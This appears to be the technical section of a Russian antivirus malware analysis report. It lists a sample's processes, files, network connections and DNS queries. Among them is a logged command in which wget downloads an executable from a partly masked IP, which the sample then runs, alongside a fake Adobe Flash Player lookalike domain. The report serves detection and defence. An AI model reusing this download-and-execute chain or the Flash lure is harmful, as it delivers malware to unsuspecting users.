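Техническая информация
Примечание: символы «#» в адресах ниже, по-видимому, заменяют часть символов, скрытых при публикации; эти значения не являются буквальными индикаторами, и их нельзя использовать для точного сопоставления.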
- '%TEMP%\8797654345678.exe' (загружен из сети Интернет)
- '%TEMP%\wget.exe' http://37.##0.198.188/"8797654345678.exe"
- '%TEMP%\8797654345678.exe'
- '%ProgramFiles%\Internet Explorer\IEXPLORE.EXE' -nohome
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\wget.cmd" "
- '<SYSTEM32>\chcp.com' 1251
- %TEMP%\wget.cmd
- %TEMP%\8797654345678.exe
- %HOMEPATH%\Local Settings\<INETFILES>\Content.IE5\KHMHGZ4F\flashplayer[1]
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\wget.exe
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- 'ge#.#dobe.com':80
- '37.##0.198.188':80
- 'localhost':1037
- http://ge#.#dobe.com/flashplayer
- http://37.##0.198.188/8797654345678.exe
- DNS ASK ge#.#dobe.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'IEFrame' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: '' WindowName: ''